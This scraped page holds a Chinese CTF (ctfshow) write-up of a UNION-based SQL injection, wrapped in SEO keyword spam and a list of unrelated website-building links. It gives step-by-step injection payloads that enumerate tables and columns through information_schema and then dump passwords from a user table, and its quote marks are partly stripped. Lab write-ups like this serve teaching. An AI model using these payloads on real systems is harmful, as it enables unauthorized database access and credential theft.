当前位置: 首页 > news >正文

做网站收款支付宝接口潍坊专业做网站公司

做网站收款支付宝接口,潍坊专业做网站公司,旅游网站建设方案2019,国外网站策划//拼接sql语句查找指定ID用户 $sql select username,password from ctfshow_user2 where username !flag and id .$_GET[id]. limit 1;; 联合查询 该题目与上一个题目不是同一个类型#xff0c;该题目需要进行sql联合查询。 第一步#xff1a;确…//拼接sql语句查找指定ID用户 $sql select username,password from ctfshow_user2 where username !flag and id .$_GET[id]. limit 1;; 联合查询 该题目与上一个题目不是同一个类型该题目需要进行sql联合查询。 第一步确定sql注入的类型。1 or 11 确定为字符型(根据上面的php代码也能确定) 第二步使用order by确定列数 1 order by 3 -- 第三步测试回显位1 union select 1,2 -- 第四步使用database()查询数据库 1 union select 1, database() -- 第五步查询表名 x union select 1,group_concat(table_name),x from information_schema.tables where table_schemadatabase() -- 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() -- 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemactfshow_web -- 第一个x代表是需要确定哪种注入类型。 第二个x代表是需要确定是有几个列并且确定回显字段。 第六步查询字段名 x union select 1,group_concat(column_name),x from information_schema.columns where table_schemadatabase()table_name查询到的表名 -- 1 union select 1,group_concat(column_name) from information_schema.columns where table_schemadatabase()table_namectfshow_user2 -- 1 union select 1,group_concat(column_name) from information_schema.columns where table_schemactfshow_webtable_namectfshow_user2 -- 两种方法均无法查询出字段名因为语法出现问题。应该使用下列查询语句加个括号 1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schemadatabase()table_namectfshow_user2) -- 仍然不正确在语句中不需要数据库的信息。 1 union select 1,(select group_concat(column_name) from information_schema.columns where table_namectfshow_user2) -- 所以最开始语句的问题是多加了数据库的信息 1 union select 1,group_concat(column_name) from information_schema.columns where table_namectfshow_user2 -- 第七步查询字段值 1 union select 1,group_concat(password) from ctfshow_user2 -- 1 union select 1,password from ctfshow_user2 -- 以上问题错误的原因该题目只有一个数据库因此在查询字段时不需要指定数据库名。
http://www.w-s-a.com/news/135036/

相关文章:

  • 传媒公司 网站开发厦门网站建设门户
  • 宿城区建设局网站做网站的绿色背景图
  • 网站空间托管合同 .doc网站开发团队 组建
  • 网站建设书本信息it运维服务
  • 四核网站建设设计网站流程
  • ui设计网站设计与网页制作视频教程wordpress插件漏洞利用
  • 网站建设公司排名前十做网站的最终目的
  • 选择网站开发公司的标准中国网站建设市场规模
  • 衣服网站建设策划书广州住房和城乡建设部网站
  • 微商城科技淄博网站建设优化seo
  • 杭州 网站设计制作东圃手机网站开发
  • 网站文章页内链结构不好可以改吗微信平台如何开发
  • 炫酷业务网站课程网站如何建设方案
  • 网站建设服务器可以租吗wordpress微信打赏
  • 网站制作的重要流程图大连网站优化快速排名
  • 河南省住房建设厅官方网站注册公司邮箱需要什么
  • 美橙网站注册华为手机网站建设策划方案论文
  • 河南省和建设厅网站首页在线图片翻译
  • 关于备案空壳网站清理通知去别人网站挂黑链
  • 做网站待遇世界购物平台排行榜
  • 售后服务网站什么网站免费做简历模板
  • 网站模板怎么修改成都网站优化seo
  • 给装修公司做推广的网站wordpress站点的根目录
  • 怎么创建企业网站wordpress怎么做404页面跳转
  • 福建省住房和建设厅网站网站做著作权
  • 编程代码网站网站搭建的注意事项
  • 音乐网站排名公司如何做自己的网站
  • 网站设计模式三网合一网站源代码
  • 珠海市品牌网站建设哪家好宛城区网站制作
  • 网站维护工程师代写文章兼职